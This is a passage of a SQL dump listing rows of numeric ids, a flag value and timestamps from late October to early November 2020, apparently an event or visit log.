20:50:29'),(7495,1600,1,'2020-10-24','2020-10-24 21:06:26'),(7496,472,1,'2020-10-24','2020-10-24 21:48:53'),(7497,570,1,'2020-10-24','2020-10-24 22:25:09'),(7498,2989,1,'2020-10-25','2020-10-25 01:08:10'),(7499,1604,1,'2020-10-25','2020-10-25 04:11:55'),(7500,1588,1,'2020-10-25','2020-10-25 06:11:52'),(7501,2309,1,'2020-10-25','2020-10-25 06:22:05'),(7502,1600,1,'2020-10-25','2020-10-25 06:41:53'),(7503,1614,1,'2020-10-25','2020-10-25 07:51:08'),(7504,1614,1,'2020-10-25','2020-10-25 08:37:42'),(7505,84,1,'2020-10-25','2020-10-25 09:11:11'),(7506,1877,1,'2020-10-25','2020-10-25 09:11:56'),(7507,84,1,'2020-10-25','2020-10-25 09:12:27'),(7508,1741,1,'2020-10-25','2020-10-25 09:46:42'),(7509,2159,1,'2020-10-25','2020-10-25 10:30:16'),(7510,2159,1,'2020-10-25','2020-10-25 12:04:31'),(7511,1604,1,'2020-10-25','2020-10-25 12:57:45'),(7512,3069,1,'2020-10-25','2020-10-25 13:42:26'),(7513,1604,1,'2020-10-25','2020-10-25 14:42:43'),(7514,1588,1,'2020-10-25','2020-10-25 14:47:55'),(7515,468,1,'2020-10-25','2020-10-25 15:21:11'),(7516,3107,1,'2020-10-25','2020-10-25 15:31:53'),(7517,1586,1,'2020-10-25','2020-10-25 16:38:23'),(7518,2457,1,'2020-10-25','2020-10-25 17:02:20'),(7519,1600,1,'2020-10-25','2020-10-25 17:08:28'),(7520,1606,1,'2020-10-25','2020-10-25 17:28:23'),(7521,2309,1,'2020-10-25','2020-10-25 18:08:26'),(7522,1582,1,'2020-10-25','2020-10-25 18:28:15'),(7523,2457,1,'2020-10-25','2020-10-25 18:38:22'),(7524,1709,1,'2020-10-25','2020-10-25 20:58:36'),(7525,1582,1,'2020-10-25','2020-10-25 21:26:42'),(7526,1612,1,'2020-10-26','2020-10-26 01:49:09'),(7527,2161,1,'2020-10-26','2020-10-26 03:00:13'),(7528,2989,1,'2020-10-26','2020-10-26 05:37:54'),(7529,2159,1,'2020-10-26','2020-10-26 06:48:18'),(7530,2159,1,'2020-10-26','2020-10-26 06:49:09'),(7531,1600,1,'2020-10-26','2020-10-26 07:41:48'),(7532,2309,1,'2020-10-26','2020-10-26 10:14:05'),(7533,3069,1,'2020-10-26','2020-10-26 10:36:00'),(7534,1608,1,'2020-10-26','2020-10-26 11:41:25'),(7535,2309,1,'2020-10-26','2020-10-26 12:13:43'),(7536,1588,1,'2020-10-26','2020-10-26 13:08:22'),(7537,1586,1,'2020-10-26','2020-10-26 13:38:13'),(7538,1586,1,'2020-10-26','2020-10-26 13:45:09'),(7539,1600,1,'2020-10-26','2020-10-26 14:52:46'),(7540,91,1,'2020-10-26','2020-10-26 14:53:34'),(7541,1586,1,'2020-10-26','2020-10-26 15:14:02'),(7542,2617,1,'2020-10-26','2020-10-26 16:00:14'),(7543,1598,1,'2020-10-26','2020-10-26 17:01:41'),(7544,1598,1,'2020-10-26','2020-10-26 17:05:48'),(7545,1600,1,'2020-10-26','2020-10-26 17:21:05'),(7546,1612,1,'2020-10-26','2020-10-26 18:19:28'),(7547,76,1,'2020-10-26','2020-10-26 18:21:22'),(7548,1606,1,'2020-10-26','2020-10-26 18:51:11'),(7549,1606,1,'2020-10-26','2020-10-26 18:58:37'),(7550,1582,1,'2020-10-26','2020-10-26 22:31:53'),(7551,3124,1,'2020-10-27','2020-10-27 00:21:12'),(7552,1588,1,'2020-10-27','2020-10-27 01:12:15'),(7553,3060,1,'2020-10-27','2020-10-27 01:48:48'),(7554,1600,1,'2020-10-27','2020-10-27 02:31:50'),(7555,2904,1,'2020-10-27','2020-10-27 03:01:26'),(7556,2904,1,'2020-10-27','2020-10-27 03:04:05'),(7557,2411,1,'2020-10-27','2020-10-27 03:44:39'),(7558,1582,1,'2020-10-27','2020-10-27 04:02:02'),(7559,1600,1,'2020-10-27','2020-10-27 04:02:41'),(7560,91,1,'2020-10-27','2020-10-27 07:19:38'),(7561,3069,1,'2020-10-27','2020-10-27 07:29:34'),(7562,484,1,'2020-10-27','2020-10-27 08:05:41'),(7563,1600,1,'2020-10-27','2020-10-27 08:23:16'),(7564,2410,1,'2020-10-27','2020-10-27 08:51:07'),(7565,2410,1,'2020-10-27','2020-10-27 08:51:11'),(7566,2993,1,'2020-10-27','2020-10-27 09:03:28'),(7567,2993,1,'2020-10-27','2020-10-27 09:03:40'),(7568,2993,1,'2020-10-27','2020-10-27 09:04:17'),(7569,72,1,'2020-10-27','2020-10-27 09:28:58'),(7570,3058,1,'2020-10-27','2020-10-27 09:51:54'),(7571,72,1,'2020-10-27','2020-10-27 10:01:43'),(7572,570,1,'2020-10-27','2020-10-27 10:28:52'),(7573,72,1,'2020-10-27','2020-10-27 10:29:55'),(7574,72,1,'2020-10-27','2020-10-27 10:35:21'),(7575,3175,1,'2020-10-27','2020-10-27 10:35:30'),(7576,3175,1,'2020-10-27','2020-10-27 10:39:10'),(7577,3175,1,'2020-10-27','2020-10-27 10:39:17'),(7578,3175,1,'2020-10-27','2020-10-27 10:39:57'),(7579,3175,1,'2020-10-27','2020-10-27 10:40:20'),(7580,3069,1,'2020-10-27','2020-10-27 10:41:03'),(7581,3180,1,'2020-10-27','2020-10-27 11:00:55'),(7582,89,1,'2020-10-27','2020-10-27 11:38:41'),(7583,2609,1,'2020-10-27','2020-10-27 11:57:12'),(7584,2609,1,'2020-10-27','2020-10-27 11:58:03'),(7585,2609,1,'2020-10-27','2020-10-27 12:00:25'),(7586,2769,1,'2020-10-27','2020-10-27 13:34:21'),(7587,76,1,'2020-10-27','2020-10-27 14:50:23'),(7588,2989,1,'2020-10-27','2020-10-27 15:02:50'),(7589,2309,1,'2020-10-27','2020-10-27 15:30:26'),(7590,1604,1,'2020-10-27','2020-10-27 16:49:25'),(7591,1604,1,'2020-10-27','2020-10-27 17:09:08'),(7592,80,1,'2020-10-27','2020-10-27 17:10:08'),(7593,1586,1,'2020-10-27','2020-10-27 17:26:46'),(7594,3104,1,'2020-10-27','2020-10-27 17:27:17'),(7595,486,1,'2020-10-27','2020-10-27 17:57:56'),(7596,3102,1,'2020-10-27','2020-10-27 18:13:06'),(7597,91,1,'2020-10-27','2020-10-27 18:52:57'),(7598,2159,1,'2020-10-27','2020-10-27 19:44:38'),(7599,2658,1,'2020-10-27','2020-10-27 19:45:10'),(7600,2658,1,'2020-10-27','2020-10-27 20:29:08'),(7601,80,1,'2020-10-27','2020-10-27 20:32:41'),(7602,1588,1,'2020-10-27','2020-10-27 21:01:30'),(7603,1604,1,'2020-10-27','2020-10-27 21:49:46'),(7604,2309,1,'2020-10-27','2020-10-27 23:11:34'),(7605,1718,1,'2020-10-28','2020-10-28 00:27:38'),(7606,3004,1,'2020-10-28','2020-10-28 00:41:16'),(7607,486,1,'2020-10-28','2020-10-28 02:05:06'),(7608,1600,1,'2020-10-28','2020-10-28 03:40:36'),(7609,1600,1,'2020-10-28','2020-10-28 03:41:14'),(7610,1588,1,'2020-10-28','2020-10-28 05:11:15'),(7611,3069,1,'2020-10-28','2020-10-28 05:56:14'),(7612,1718,1,'2020-10-28','2020-10-28 06:10:34'),(7613,1582,1,'2020-10-28','2020-10-28 06:41:17'),(7614,1602,1,'2020-10-28','2020-10-28 07:26:15'),(7615,1604,1,'2020-10-28','2020-10-28 08:56:14'),(7616,3117,1,'2020-10-28','2020-10-28 09:20:56'),(7617,1600,1,'2020-10-28','2020-10-28 09:27:09'),(7618,2751,1,'2020-10-28','2020-10-28 09:44:51'),(7619,1582,1,'2020-10-28','2020-10-28 10:19:30'),(7620,80,1,'2020-10-28','2020-10-28 10:26:50'),(7621,1604,1,'2020-10-28','2020-10-28 10:57:53'),(7622,68,1,'2020-10-28','2020-10-28 10:58:36'),(7623,1604,1,'2020-10-28','2020-10-28 10:59:22'),(7624,473,1,'2020-10-28','2020-10-28 11:00:30'),(7625,2309,1,'2020-10-28','2020-10-28 11:12:00'),(7626,68,1,'2020-10-28','2020-10-28 11:47:12'),(7627,72,1,'2020-10-28','2020-10-28 11:47:31'),(7628,335,1,'2020-10-28','2020-10-28 11:47:50'),(7629,1718,1,'2020-10-28','2020-10-28 11:49:57'),(7630,2801,1,'2020-10-28','2020-10-28 12:19:51'),(7631,3090,1,'2020-10-28','2020-10-28 12:30:11'),(7632,76,1,'2020-10-28','2020-10-28 12:31:13'),(7633,91,1,'2020-10-28','2020-10-28 12:31:46'),(7634,1718,1,'2020-10-28','2020-10-28 12:39:30'),(7635,570,1,'2020-10-28','2020-10-28 12:48:38'),(7636,1747,1,'2020-10-28','2020-10-28 13:01:11'),(7637,1747,1,'2020-10-28','2020-10-28 13:01:16'),(7638,1747,1,'2020-10-28','2020-10-28 13:01:59'),(7639,1747,1,'2020-10-28','2020-10-28 13:04:27'),(7640,1747,1,'2020-10-28','2020-10-28 13:05:20'),(7641,570,1,'2020-10-28','2020-10-28 13:06:14'),(7642,1600,1,'2020-10-28','2020-10-28 13:20:03'),(7643,570,1,'2020-10-28','2020-10-28 13:36:20'),(7644,1711,1,'2020-10-28','2020-10-28 13:44:04'),(7645,2617,1,'2020-10-28','2020-10-28 13:44:17'),(7646,2410,1,'2020-10-28','2020-10-28 14:30:14'),(7647,1586,1,'2020-10-28','2020-10-28 14:57:47'),(7648,3034,1,'2020-10-28','2020-10-28 15:23:04'),(7649,1718,1,'2020-10-28','2020-10-28 17:05:07'),(7650,91,1,'2020-10-28','2020-10-28 20:58:54'),(7651,3005,1,'2020-10-28','2020-10-28 21:09:00'),(7652,1770,1,'2020-10-28','2020-10-28 21:10:33'),(7653,1770,1,'2020-10-28','2020-10-28 21:17:35'),(7654,1586,1,'2020-10-28','2020-10-28 21:58:53'),(7655,2419,1,'2020-10-28','2020-10-28 22:09:04'),(7656,2248,1,'2020-10-28','2020-10-28 22:27:54'),(7657,1703,1,'2020-10-28','2020-10-28 22:32:09'),(7658,91,1,'2020-10-28','2020-10-28 22:36:48'),(7659,1582,1,'2020-10-28','2020-10-28 22:37:40'),(7660,91,1,'2020-10-28','2020-10-28 22:37:57'),(7661,1582,1,'2020-10-28','2020-10-28 22:38:11'),(7662,3034,1,'2020-10-28','2020-10-28 23:09:39'),(7663,2457,1,'2020-10-28','2020-10-28 23:50:02'),(7664,2557,1,'2020-10-29','2020-10-29 00:20:22'),(7665,3180,1,'2020-10-29','2020-10-29 00:28:05'),(7666,3181,1,'2020-10-29','2020-10-29 00:28:08'),(7667,3175,1,'2020-10-29','2020-10-29 00:28:10'),(7668,3178,1,'2020-10-29','2020-10-29 00:29:08'),(7669,1614,1,'2020-10-29','2020-10-29 01:31:26'),(7670,68,1,'2020-10-29','2020-10-29 03:22:17'),(7671,2769,1,'2020-10-29','2020-10-29 04:22:13'),(7672,1872,1,'2020-10-29','2020-10-29 05:22:30'),(7673,84,1,'2020-10-29','2020-10-29 05:53:08'),(7674,1697,1,'2020-10-29','2020-10-29 07:03:11'),(7675,1718,1,'2020-10-29','2020-10-29 08:34:14'),(7676,1612,1,'2020-10-29','2020-10-29 09:12:54'),(7677,570,1,'2020-10-29','2020-10-29 09:26:34'),(7678,80,1,'2020-10-29','2020-10-29 09:40:52'),(7679,1594,1,'2020-10-29','2020-10-29 10:30:31'),(7680,1588,1,'2020-10-29','2020-10-29 10:31:15'),(7681,1582,1,'2020-10-29','2020-10-29 10:33:54'),(7682,1718,1,'2020-10-29','2020-10-29 10:36:37'),(7683,2457,1,'2020-10-29','2020-10-29 11:44:35'),(7684,1614,1,'2020-10-29','2020-10-29 13:27:41'),(7685,80,1,'2020-10-29','2020-10-29 14:20:29'),(7686,470,1,'2020-10-29','2020-10-29 17:00:00'),(7687,3027,1,'2020-10-29','2020-10-29 17:16:34'),(7688,3090,1,'2020-10-29','2020-10-29 17:47:08'),(7689,3127,1,'2020-10-29','2020-10-29 19:43:34'),(7690,1604,1,'2020-10-29','2020-10-29 20:02:12'),(7691,1604,1,'2020-10-29','2020-10-29 20:02:28'),(7692,3127,1,'2020-10-29','2020-10-29 20:04:13'),(7693,1594,1,'2020-10-29','2020-10-29 20:13:43'),(7694,2154,1,'2020-10-29','2020-10-29 20:25:05'),(7695,2751,1,'2020-10-29','2020-10-29 21:43:38'),(7696,1598,1,'2020-10-29','2020-10-29 22:03:50'),(7697,1606,1,'2020-10-29','2020-10-29 23:08:55'),(7698,1606,1,'2020-10-29','2020-10-29 23:28:17'),(7699,1586,1,'2020-10-30','2020-10-30 00:08:11'),(7700,1610,1,'2020-10-30','2020-10-30 01:42:48'),(7701,1701,1,'2020-10-30','2020-10-30 02:02:34'),(7702,2309,1,'2020-10-30','2020-10-30 02:32:03'),(7703,477,1,'2020-10-30','2020-10-30 04:14:02'),(7704,1718,1,'2020-10-30','2020-10-30 04:15:21'),(7705,3109,1,'2020-10-30','2020-10-30 06:44:58'),(7706,3124,1,'2020-10-30','2020-10-30 09:31:25'),(7707,76,1,'2020-10-30','2020-10-30 09:33:09'),(7708,80,1,'2020-10-30','2020-10-30 09:42:30'),(7709,80,1,'2020-10-30','2020-10-30 09:43:05'),(7710,80,1,'2020-10-30','2020-10-30 09:45:33'),(7711,80,1,'2020-10-30','2020-10-30 09:51:50'),(7712,1544,1,'2020-10-30','2020-10-30 10:14:12'),(7713,2159,1,'2020-10-30','2020-10-30 10:24:48'),(7714,80,1,'2020-10-30','2020-10-30 10:36:32'),(7715,1544,1,'2020-10-30','2020-10-30 10:42:54'),(7716,74,1,'2020-10-30','2020-10-30 10:46:35'),(7717,2410,1,'2020-10-30','2020-10-30 10:57:30'),(7718,2159,1,'2020-10-30','2020-10-30 12:07:42'),(7719,89,1,'2020-10-30','2020-10-30 12:36:38'),(7720,2293,1,'2020-10-30','2020-10-30 13:36:39'),(7721,1582,1,'2020-10-30','2020-10-30 13:37:25'),(7722,1606,1,'2020-10-30','2020-10-30 13:50:57'),(7723,1606,1,'2020-10-30','2020-10-30 15:57:58'),(7724,474,1,'2020-10-30','2020-10-30 16:27:33'),(7725,1707,1,'2020-10-30','2020-10-30 16:58:06'),(7726,1614,1,'2020-10-30','2020-10-30 16:58:46'),(7727,2775,1,'2020-10-30','2020-10-30 18:39:08'),(7728,2801,1,'2020-10-30','2020-10-30 18:49:02'),(7729,2813,1,'2020-10-30','2020-10-30 19:20:20'),(7730,3107,1,'2020-10-30','2020-10-30 20:18:43'),(7731,2956,1,'2020-10-30','2020-10-30 22:18:05'),(7732,2904,1,'2020-10-30','2020-10-30 22:28:18'),(7733,1598,1,'2020-10-30','2020-10-30 22:36:27'),(7734,1598,1,'2020-10-30','2020-10-30 22:36:52'),(7735,2748,1,'2020-10-30','2020-10-30 22:37:29'),(7736,72,1,'2020-10-31','2020-10-31 00:37:41'),(7737,1766,1,'2020-10-31','2020-10-31 00:48:18'),(7738,2775,1,'2020-10-31','2020-10-31 02:57:50'),(7739,1749,1,'2020-10-31','2020-10-31 03:58:20'),(7740,2911,1,'2020-10-31','2020-10-31 05:58:55'),(7741,2956,1,'2020-10-31','2020-10-31 07:15:10'),(7742,1600,1,'2020-10-31','2020-10-31 07:16:36'),(7743,1745,1,'2020-10-31','2020-10-31 07:17:03'),(7744,1600,1,'2020-10-31','2020-10-31 07:17:55'),(7745,2309,1,'2020-10-31','2020-10-31 07:32:03'),(7746,1594,1,'2020-10-31','2020-10-31 07:50:10'),(7747,2658,1,'2020-10-31','2020-10-31 08:00:08'),(7748,1730,1,'2020-10-31','2020-10-31 08:49:57'),(7749,3087,1,'2020-10-31','2020-10-31 09:10:40'),(7750,72,1,'2020-10-31','2020-10-31 11:10:32'),(7751,3069,1,'2020-10-31','2020-10-31 11:47:04'),(7752,1774,1,'2020-10-31','2020-10-31 12:11:30'),(7753,1705,1,'2020-10-31','2020-10-31 13:20:14'),(7754,1586,1,'2020-10-31','2020-10-31 14:00:19'),(7755,1766,1,'2020-10-31','2020-10-31 14:01:35'),(7756,2248,1,'2020-10-31','2020-10-31 16:17:39'),(7757,2804,1,'2020-10-31','2020-10-31 16:57:11'),(7758,2410,1,'2020-10-31','2020-10-31 17:17:20'),(7759,2503,1,'2020-10-31','2020-10-31 17:42:40'),(7760,3056,1,'2020-10-31','2020-10-31 18:27:18'),(7761,2964,1,'2020-10-31','2020-10-31 18:47:42'),(7762,80,1,'2020-10-31','2020-10-31 18:57:53'),(7763,108,1,'2020-10-31','2020-10-31 18:57:56'),(7764,1776,1,'2020-10-31','2020-10-31 19:03:38'),(7765,3066,1,'2020-10-31','2020-10-31 19:14:10'),(7766,76,1,'2020-10-31','2020-10-31 20:07:47'),(7767,2813,1,'2020-10-31','2020-10-31 20:28:01'),(7768,80,1,'2020-10-31','2020-10-31 20:38:01'),(7769,2309,1,'2020-10-31','2020-10-31 20:47:48'),(7770,1600,1,'2020-10-31','2020-10-31 21:18:15'),(7771,1600,1,'2020-10-31','2020-10-31 21:38:25'),(7772,3109,1,'2020-10-31','2020-10-31 22:58:43'),(7773,1588,1,'2020-10-31','2020-10-31 23:39:06'),(7774,1602,1,'2020-10-31','2020-10-31 23:41:33'),(7775,1594,1,'2020-11-01','2020-11-01 00:28:25'),(7776,1598,1,'2020-11-01','2020-11-01 01:23:18'),(7777,68,1,'2020-11-01','2020-11-01 01:24:44'),(7778,1598,1,'2020-11-01','2020-11-01 01:25:15'),(7779,1614,1,'2020-11-01','2020-11-01 01:59:11'),(7780,2309,1,'2020-11-01','2020-11-01 03:19:38'),(7781,2751,1,'2020-11-01','2020-11-01 03:29:38'),(7782,1614,1,'2020-11-01','2020-11-01 03:43:47'),(7783,1730,1,'2020-11-01','2020-11-01 04:10:10'),(7784,3069,1,'2020-11-01','2020-11-01 05:09:59'),(7785,1588,1,'2020-11-01','2020-11-01 05:19:46'),(7786,570,1,'2020-11-01','2020-11-01 05:29:46'),(7787,1600,1,'2020-11-01','2020-11-01 06:11:22'),(7788,1600,1,'2020-11-01','2020-11-01 06:30:00'),(7789,2309,1,'2020-11-01','2020-11-01 06:52:04'),(7790,1586,1,'2020-11-01','2020-11-01 07:15:19'),(7791,84,1,'2020-11-01','2020-11-01 07:16:51'),(7792,1586,1,'2020-11-01','2020-11-01 07:19:58'),(7793,3181,1,'2020-11-01','2020-11-01 07:45:34'),(7794,3180,1,'2020-11-01','2020-11-01 07:47:37'),(7795,91,1,'2020-11-01','2020-11-01 07:51:52'),(7796,1582,1,'2020-11-01','2020-11-01 08:00:46'),(7797,1606,1,'2020-11-01','2020-11-01 08:11:04'),(7798,1582,1,'2020-11-01','2020-11-01 08:31:46'),(7799,80,1,'2020-11-01','2020-11-01 09:11:30'),(7800,2769,1,'2020-11-01','2020-11-01 09:21:39'),(7801,1614,1,'2020-11-01','2020-11-01 11:02:28'),(7802,2609,1,'2020-11-01','2020-11-01 11:12:40'),(7803,2178,1,'2020-11-01','2020-11-01 11:52:40'),(7804,2178,1,'2020-11-01','2020-11-01 11:53:12'),(7805,2309,1,'2020-11-01','2020-11-01 12:02:53'),(7806,2751,1,'2020-11-01','2020-11-01 12:12:53'),(7807,1614,1,'2020-11-01','2020-11-01 13:33:25'),(7808,2457,1,'2020-11-01','2020-11-01 13:53:38'),(7809,2457,1,'2020-11-01','2020-11-01 14:03:38'),(7810,3069,1,'2020-11-01','2020-11-01 14:13:36'),(7811,570,1,'2020-11-01','2020-11-01 15:04:04'),(7812,1588,1,'2020-11-01','2020-11-01 15:14:16'),(7813,1600,1,'2020-11-01','2020-11-01 16:04:33'),(7814,1600,1,'2020-11-01','2020-11-01 16:14:30'),(7815,2309,1,'2020-11-01','2020-11-01 16:34:27'),(7816,2813,1,'2020-11-01','2020-11-01 16:51:24'),(7817,1594,1,'2020-11-01','2020-11-01 17:22:47'),(7818,1606,1,'2020-11-01','2020-11-01 18:04:57'),(7819,1582,1,'2020-11-01','2020-11-01 18:25:07'),(7820,76,1,'2020-11-01','2020-11-01 18:34:56'),(7821,1737,1,'2020-11-01','2020-11-01 18:44:58'),(7822,2801,1,'2020-11-01','2020-11-01 19:30:51'),(7823,2904,1,'2020-11-01','2020-11-01 19:35:27'),(7824,1614,1,'2020-11-01','2020-11-01 19:55:43'),(7825,2410,1,'2020-11-01','2020-11-01 20:11:12'),(7826,3023,1,'2020-11-01','2020-11-01 21:21:38'),(7827,2769,1,'2020-11-01','2020-11-01 21:25:35'),(7828,1586,1,'2020-11-01','2020-11-01 21:40:26'),(7829,2617,1,'2020-11-01','2020-11-01 21:40:40'),(7830,3127,1,'2020-11-01','2020-11-01 21:47:20'),(7831,1586,1,'2020-11-01','2020-11-01 22:35:32'),(7832,1718,1,'2020-11-01','2020-11-01 22:46:52'),(7833,3069,1,'2020-11-01','2020-11-01 23:15:29'),(7834,2609,1,'2020-11-01','2020-11-01 23:45:58'),(7835,3069,1,'2020-11-01','2020-11-01 23:58:18'),(7836,68,1,'2020-11-02','2020-11-02 00:19:10'),(7837,1588,1,'2020-11-02','2020-11-02 00:36:19'),(7838,1582,1,'2020-11-02','2020-11-02 00:43:25'),(7839,76,1,'2020-11-02','2020-11-02 00:45:54'),(7840,1582,1,'2020-11-02','2020-11-02 00:46:24'),(7841,1600,1,'2020-11-02','2020-11-02 01:16:31'),(7842,1600,1,'2020-11-02','2020-11-02 02:16:17'),(7843,2309,1,'2020-11-02','2020-11-02 03:06:37'),(7844,570,1,'2020-11-02','2020-11-02 03:26:49'),(7845,1588,1,'2020-11-02','2020-11-02 03:46:51'),(7846,1582,1,'2020-11-02','2020-11-02 04:36:53'),(7847,1614,1,'2020-11-02','2020-11-02 04:56:45'),(7848,1766,1,'2020-11-02','2020-11-02 05:17:37'),(7849,2801,1,'2020-11-02','2020-11-02 05:49:55'),(7850,1718,1,'2020-11-02','2020-11-02 06:12:44'),(7851,1604,1,'2020-11-02','2020-11-02 07:18:12'),(7852,3069,1,'2020-11-02','2020-11-02 08:13:09'),(7853,2309,1,'2020-11-02','2020-11-02 08:18:32'),(7854,1586,1,'2020-11-02','2020-11-02 08:38:34'),(7855,2813,1,'2020-11-02','2020-11-02 08:55:27'),(7856,2457,1,'2020-11-02','2020-11-02 09:08:31'),(7857,2609,1,'2020-11-02','2020-11-02 09:18:27'),(7858,1588,1,'2020-11-02','2020-11-02 09:30:11'),(7859,84,1,'2020-11-02','2020-11-02 09:31:46'),(7860,89,1,'2020-11-02','2020-11-02 09:32:02'),(7861,76,1,'2020-11-02','2020-11-02 09:40:29'),(7862,76,1,'2020-11-02','2020-11-02 09:49:34'),(7863,2769,1,'2020-11-02','2020-11-02 10:08:39'),(7864,570,1,'2020-11-02','2020-11-02 10:18:36'),(7865,80,1,'2020-11-02','2020-11-02 10:38:27'),(7866,1602,1,'2020-11-02','2020-11-02 11:10:43'),(7867,1608,1,'2020-11-02','2020-11-02 11:11:35'),(7868,89,1,'2020-11-02','2020-11-02 11:29:14'),(7869,1592,1,'2020-11-02','2020-11-02 11:52:19'),(7870,3107,1,'2020-11-02','2020-11-02 11:55:01'),(7871,89,1,'2020-11-02','2020-11-02 11:59:54'),(7872,1600,1,'2020-11-02','2020-11-02 12:09:18'),(7873,91,1,'2020-11-02','2020-11-02 12:29:28'),(7874,2457,1,'2020-11-02','2020-11-02 12:39:47'),(7875,1582,1,'2020-11-02','2020-11-02 13:49:19'),(7876,1614,1,'2020-11-02','2020-11-02 14:09:23'),(7877,1718,1,'2020-11-02','2020-11-02 14:17:37'),(7878,473,1,'2020-11-02','2020-11-02 14:31:48'),(7879,1776,1,'2020-11-02','2020-11-02 14:43:01'),(7880,1608,1,'2020-11-02','2020-11-02 14:43:06'),(7881,2457,1,'2020-11-02','2020-11-02 14:49:45'),(7882,2178,1,'2020-11-02','2020-11-02 15:09:36'),(7883,3107,1,'2020-11-02','2020-11-02 15:19:27'),(7884,1586,1,'2020-11-02','2020-11-02 15:24:52'),(7885,91,1,'2020-11-02','2020-11-02 15:25:42'),(7886,2503,1,'2020-11-02','2020-11-02 15:29:46'),(7887,3127,1,'2020-11-02','2020-11-02 15:30:07'),(7888,108,1,'2020-11-02','2020-11-02 15:37:36'),(7889,76,1,'2020-11-02','2020-11-02 15:38:18'),(7890,89,1,'2020-11-02','2020-11-02 15:38:48'),(7891,3004,1,'2020-11-02','2020-11-02 15:39:48'),(7892,89,1,'2020-11-02','2020-11-02 15:40:14'),(7893,2769,1,'2020-11-02','2020-11-02 15:40:36'),(7894,2775,1,'2020-11-02','2020-11-02 15:41:36'),(7895,1718,1,'2020-11-02','2020-11-02 15:50:32'),(7896,1582,1,'2020-11-02','2020-11-02 15:59:37'),(7897,1586,1,'2020-11-02','2020-11-02 16:13:39'),(7898,1588,1,'2020-11-02','2020-11-02 16:29:37'),(7899,2989,1,'2020-11-02','2020-11-02 17:28:54'),(7900,3069,1,'2020-11-02','2020-11-02 17:29:40'),(7901,1604,1,'2020-11-02','2020-11-02 17:39:52'),(7902,1586,1,'2020-11-02','2020-11-02 17:49:45'),(7903,3124,1,'2020-11-02','2020-11-02 18:10:20'),(7904,3041,1,'2020-11-02','2020-11-02 18:13:09'),(7905,3117,1,'2020-11-02','2020-11-02 18:13:22'),(7906,1588,1,'2020-11-02','2020-11-02 18:20:22'),(7907,2813,1,'2020-11-02','2020-11-02 18:39:39'),(7908,2309,1,'2020-11-02','2020-11-02 19:13:48'),(7909,2769,1,'2020-11-02','2020-11-02 19:20:22'),(7910,80,1,'2020-11-02','2020-11-02 19:29:36'),(7911,2457,1,'2020-11-02','2020-11-02 19:39:50'),(7912,2309,1,'2020-11-02','2020-11-02 19:59:42'),(7913,570,1,'2020-11-02','2020-11-02 20:40:44'),(7914,1600,1,'2020-11-02','2020-11-02 21:12:40'),(7915,3109,1,'2020-11-02','2020-11-02 21:21:24'),(7916,2801,1,'2020-11-02','2020-11-02 21:42:12'),(7917,1718,1,'2020-11-02','2020-11-02 21:49:38'),(7918,1606,1,'2020-11-02','2020-11-02 22:52:36'),(7919,1614,1,'2020-11-03','2020-11-03 00:11:09'),(7920,91,1,'2020-11-03','2020-11-03 00:20:58'),(7921,570,1,'2020-11-03','2020-11-03 00:51:07'),(7922,108,1,'2020-11-03','2020-11-03 01:01:35'),(7923,3127,1,'2020-11-03','2020-11-03 01:03:54'),(7924,1582,1,'2020-11-03','2020-11-03 01:21:30'),(7925,1588,1,'2020-11-03','2020-11-03 01:44:14'),(7926,3090,1,'2020-11-03','2020-11-03 02:06:00'),(7927,488,1,'2020-11-03','2020-11-03 02:11:52'),(7928,1604,1,'2020-11-03','2020-11-03 03:07:14'),(7929,2309,1,'2020-11-03','2020-11-03 03:36:32'),(7930,1588,1,'2020-11-03','2020-11-03 03:46:14'),(7931,1582,1,'2020-11-03','2020-11-03 04:06:32'),(7932,2813,1,'2020-11-03','2020-11-03 04:08:19'),(7933,1709,1,'2020-11-03','2020-11-03 04:36:45'),(7934,2769,1,'2020-11-03','2020-11-03 05:06:23'),(7935,3072,1,'2020-11-03','2020-11-03 05:07:14'),(7936,1586,1,'2020-11-03','2020-11-03 05:16:22'),(7937,2457,1,'2020-11-03','2020-11-03 05:26:23'),(7938,1600,1,'2020-11-03','2020-11-03 05:46:23'),(7939,2309,1,'2020-11-03','2020-11-03 06:07:49'),(7940,80,1,'2020-11-03','2020-11-03 06:57:36'),(7941,3104,1,'2020-11-03','2020-11-03 07:30:14'),(7942,3034,1,'2020-11-03','2020-11-03 07:30:18'),(7943,3104,1,'2020-11-03','2020-11-03 07:37:20'),(7944,72,1,'2020-11-03','2020-11-03 08:07:33'),(7945,2904,1,'2020-11-03','2020-11-03 08:17:45'),(7946,1730,1,'2020-11-03','2020-11-03 08:38:07'),(7947,1778,1,'2020-11-03','2020-11-03 09:13:12'),(7948,1695,1,'2020-11-03','2020-11-03 09:13:40'),(7949,2161,1,'2020-11-03','2020-11-03 09:57:28'),(7950,1614,1,'2020-11-03','2020-11-03 10:38:34'),(7951,2457,1,'2020-11-03','2020-11-03 10:43:58'),(7952,1594,1,'2020-11-03','2020-11-03 10:52:54'),(7953,1594,1,'2020-11-03','2020-11-03 10:54:52'),(7954,1594,1,'2020-11-03','2020-11-03 10:55:46'),(7955,3099,1,'2020-11-03','2020-11-03 12:12:56'),(7956,3099,1,'2020-11-03','2020-11-03 12:13:39'),(7957,3099,1,'2020-11-03','2020-11-03 12:14:43'),(7958,3099,1,'2020-11-03','2020-11-03 12:15:17'),(7959,3069,1,'2020-11-03','2020-11-03 12:24:04'),(7960,1600,1,'2020-11-03','2020-11-03 13:03:41'),(7961,2252,1,'2020-11-03','2020-11-03 14:10:54'),(7962,1604,1,'2020-11-03','2020-11-03 14:16:00'),(7963,3045,1,'2020-11-03','2020-11-03 14:31:28'),(7964,2609,1,'2020-11-03','2020-11-03 15:51:49'),(7965,2609,1,'2020-11-03','2020-11-03 16:05:16'),(7966,1598,1,'2020-11-03','2020-11-03 16:14:59'),(7967,1598,1,'2020-11-03','2020-11-03 16:18:57'),(7968,2309,1,'2020-11-03','2020-11-03 16:22:19'),(7969,2457,1,'2020-11-03','2020-11-03 18:08:26'),(7970,570,1,'2020-11-03','2020-11-03 18:27:48'),(7971,1586,1,'2020-11-03','2020-11-03 18:54:45'),(7972,1582,1,'2020-11-03','2020-11-03 19:11:35'),(7973,3127,1,'2020-11-03','2020-11-03 19:13:45'),(7974,2813,1,'2020-11-03','2020-11-03 20:36:55'),(7975,2813,1,'2020-11-03','2020-11-03 20:37:46'),(7976,3117,1,'2020-11-03','2020-11-03 21:06:53'),(7977,1614,1,'2020-11-03','2020-11-03 21:09:30'),(7978,80,1,'2020-11-03','2020-11-03 21:54:27'),(7979,3127,1,'2020-11-03','2020-11-03 21:55:17'),(7980,2769,1,'2020-11-03','2020-11-03 